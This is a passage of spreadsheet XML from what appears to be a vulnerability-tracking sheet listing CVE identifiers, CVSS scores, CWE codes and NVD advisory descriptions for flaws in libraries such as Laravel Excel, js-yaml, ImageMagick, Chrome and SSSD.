      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr"/>
      <c r="L515" s="5" t="inlineStr"/>
      <c r="M515" s="5" t="inlineStr"/>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P515" s="5" t="inlineStr"/>
      <c r="Q515" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R515" s="5" t="inlineStr">
        <is>
          <t>Laravel Excel provides supercharged Excel exports and imports in Laravel. From 3.1.8 until 3.1.70, in src/Files/Disk.php the Maatwebsite\Excel\Files\Disk::copy() method resolves the caller-controlled $destination supplied through Excel::store(), $export-&gt;store(), or storeExcel() against the process working directory with realpath() instead of the configured filesystem disk. If the path names an existing writable file, Disk::copy() opens it with fopen() in rb+ mode and uses stream_copy_to_stream(), bypassing Flysystem path confinement and allowing an attacker whose application input controls the export path to overwrite arbitrary existing files with export content. The rb+ behavior creates a non-truncating overwrite and trailing bytes when the new export is shorter, and overwriting an executable PHP file can lead to remote code execution. This issue is fixed in version 3.1.70.</t>
        </is>
      </c>
      <c r="S515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84374</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84375</t>
        </is>
      </c>
      <c r="D516" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F516" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr"/>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P516" s="5" t="inlineStr"/>
      <c r="Q516" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="R516" s="5" t="inlineStr">
        <is>
          <t>js-yaml is a JavaScript YAML parser and dumper. From 3.0.0 until 3.15.2 and 4.3.2, maxTotalMergeKeys in lib/js-yaml/loader.js and lib/loader.js does not count empty mapping sources while processing the merge key &lt;&lt;. An attacker can alias a large sequence of empty mappings into many merge targets, causing O(N * K) processing while totalMergeKeys remains unchanged and the configured resource limit is never reached. A relatively small YAML document can therefore cause prolonged CPU consumption in applications that parse untrusted YAML, and merge processing is enabled by default on these release lines. This issue is fixed in versions 3.15.2 and 4.3.2.</t>
        </is>
      </c>
      <c r="S516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84382</t>
        </is>
      </c>
      <c r="D517" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F517" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I517" s="5" t="inlineStr"/>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr"/>
      <c r="L517" s="5" t="inlineStr"/>
      <c r="M517" s="5" t="inlineStr"/>
      <c r="N517" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O517" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr"/>
      <c r="Q517" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R517" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.12.0, the HTTPX2 content decoders in src/httpx2/httpx2/_decoders.py fully inflate each gzip, deflate, br, or zstd network chunk before iter_bytes() or aiter_bytes() yields bounded pieces to the application. A 64 KiB compressed chunk can expand to approximately 64 MiB in one intermediate allocation, so an attacker-controlled or compromised server can cause severe memory pressure or out-of-memory process termination even when the application streams the response. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="S517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85124</t>
        </is>
      </c>
      <c r="D518" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F518" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr">
        <is>
          <t>fastify:fastify\/http-proxy</t>
        </is>
      </c>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr"/>
      <c r="Q518" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R518" s="5" t="inlineStr">
        <is>
          <t>@fastify/http-proxy versions before 11.6.2 do not validate proxied HTTP request paths for backslash based dot-segments before forwarding them to the configured upstream. The plain HTTP request handler skips the destination validation that the WebSocket path performs, and the underlying reply-from library only rejects forward-slash traversal, so a request containing backslash dot-segments can escape the boundary set by the prefix and rewritePrefix options. An unauthenticated network attacker can use this to reach upstream paths that were meant to stay hidden behind the proxy, resulting in disclosure of internal endpoints. This is a path traversal issue (CWE-22). Users should upgrade to @fastify/http-proxy 11.6.2 or later.</t>
        </is>
      </c>
      <c r="S518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85124</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85505</t>
        </is>
      </c>
      <c r="D519" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F519" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr"/>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr"/>
      <c r="Q519" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R519" s="5" t="inlineStr">
        <is>
          <t>ipmi-oem in FreeIPMI before 1.6.19 has a stack-based buffer over-read in ipmi_oem_fujitsu_get_sel_entry_long_text in ipmi-oem/ipmi-oem-fujitsu.c when a BMC provides a short response, a different vulnerability than CVE-2026-50031 (which has different affected versions).</t>
        </is>
      </c>
      <c r="S519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85505</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86420</t>
        </is>
      </c>
      <c r="D520" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr">
        <is>
          <t>imagemagick:imagemagick</t>
        </is>
      </c>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr"/>
      <c r="Q520" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R520" s="5" t="inlineStr">
        <is>
          <t>ImageMagick before 7.1.2-30 and 6.9.13-55 fails to properly lower the memory budget when an operation inside OpenPixelCache fails. Repeated triggering of such failures can exhaust the process memory budget and result in a denial of service.</t>
        </is>
      </c>
      <c r="S520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86420</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86421</t>
        </is>
      </c>
      <c r="D521" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr">
        <is>
          <t>imagemagick:imagemagick</t>
        </is>
      </c>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr"/>
      <c r="Q521" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R521" s="5" t="inlineStr">
        <is>
          <t>ImageMagick before 7.1.2-30 and 6.9.13-55 contains a memory leak in the MSL image decoder. A crafted MSL image triggers memory allocation without proper deallocation, allowing an attacker to exhaust memory and cause a denial of service.</t>
        </is>
      </c>
      <c r="S521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86421</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86429</t>
        </is>
      </c>
      <c r="D522" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I522" s="5" t="inlineStr"/>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr">
        <is>
          <t>thephpleague:commonmark</t>
        </is>
      </c>
      <c r="L522" s="5" t="inlineStr"/>
      <c r="M522" s="5" t="inlineStr"/>
      <c r="N522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O522" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr"/>
      <c r="Q522" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R522" s="5" t="inlineStr">
        <is>
          <t>The league/commonmark (thephpleague/commonmark) library in versions &gt;= 1.5.0 and &lt; 2.9.1 contains quadratic parsing complexity in its SmartPunctExtension and AttributesExtension. When either extension is explicitly registered on the Environment (they are not enabled by default and are excluded from the standard CommonMark and GitHub-Flavored Markdown converters), an unauthenticated attacker can submit small, specially crafted Markdown documents — such as text alternating with unpaired quotes, contiguous runs of block-level attribute blocks, or repeated class attributes — to trigger disproportionate CPU consumption and cause a denial of service. Fixed in 2.9.1.</t>
        </is>
      </c>
      <c r="S522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86429</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87011</t>
        </is>
      </c>
      <c r="D523" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F523" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L523" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr"/>
      <c r="Q523" s="5" t="inlineStr">
        <is>
          <t>CWE-405, CWE-770</t>
        </is>
      </c>
      <c r="R523"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S523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87011</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87431</t>
        </is>
      </c>
      <c r="D524" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr"/>
      <c r="K524" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L524" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr"/>
      <c r="Q524" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R524" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87431</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87450</t>
        </is>
      </c>
      <c r="D525" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P525" s="5" t="inlineStr"/>
      <c r="Q525" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R525" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Permissions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to obtain sensitive information via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87450</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87601</t>
        </is>
      </c>
      <c r="D526" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F526" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr"/>
      <c r="Q526" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R526" s="5" t="inlineStr">
        <is>
          <t>Race condition in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87601</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87608</t>
        </is>
      </c>
      <c r="D527" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F527" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr"/>
      <c r="K527" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L527" s="5" t="inlineStr"/>
      <c r="M527" s="5" t="inlineStr"/>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P527" s="5" t="inlineStr"/>
      <c r="Q527" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R527" s="5" t="inlineStr">
        <is>
          <t>Improper certificate validation in FedCM in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass web origin policy via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87608</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87734</t>
        </is>
      </c>
      <c r="D528" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F528" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I528" s="5" t="inlineStr"/>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr"/>
      <c r="L528" s="5" t="inlineStr"/>
      <c r="M528" s="5" t="inlineStr"/>
      <c r="N528" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O528" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr"/>
      <c r="Q528" s="5" t="inlineStr">
        <is>
          <t>CWE-923</t>
        </is>
      </c>
      <c r="R528" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the utcp package before 0.0.6 for OCaml. Out-of-order segment reassembly allows remote denial of service.</t>
        </is>
      </c>
      <c r="S528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87734</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87819</t>
        </is>
      </c>
      <c r="D529" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E529" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L529" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M529" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr"/>
      <c r="Q529" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R529"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S529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87819</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87824</t>
        </is>
      </c>
      <c r="D530" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E530" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr"/>
      <c r="K530" s="5" t="inlineStr"/>
      <c r="L530" s="5" t="inlineStr"/>
      <c r="M530" s="5" t="inlineStr"/>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P530" s="5" t="inlineStr"/>
      <c r="Q530" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R530" s="5" t="inlineStr">
        <is>
          <t>zstd-jni before 1.5.7-14 fails to validate the samples buffer capacity in Zstd.trainFromBufferDirect, allowing attackers to read past buffer boundaries by supplying oversized per-sample lengths. Attackers can trigger out-of-bounds memory access by providing crafted sample length arrays that cause the native implementation to walk past the buffer allocation, resulting in JVM termination.</t>
        </is>
      </c>
      <c r="S530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87824</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87853</t>
        </is>
      </c>
      <c r="D531" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E531" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F531" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr"/>
      <c r="Q531" s="5" t="inlineStr">
        <is>
          <t>CWE-187</t>
        </is>
      </c>
      <c r="R531" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in SSSD's IdP authentication provider. The eval_access_token_buf() function compares the OIDC subject identifier using strncmp() with the authenticated user's identifier length, performing a prefix comparison instead of an exact match. An attacker whose IdP identifier is a strict prefix of a target user's identifier can authenticate as the target user.</t>
        </is>
      </c>
      <c r="S531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87853</t>
        </is>
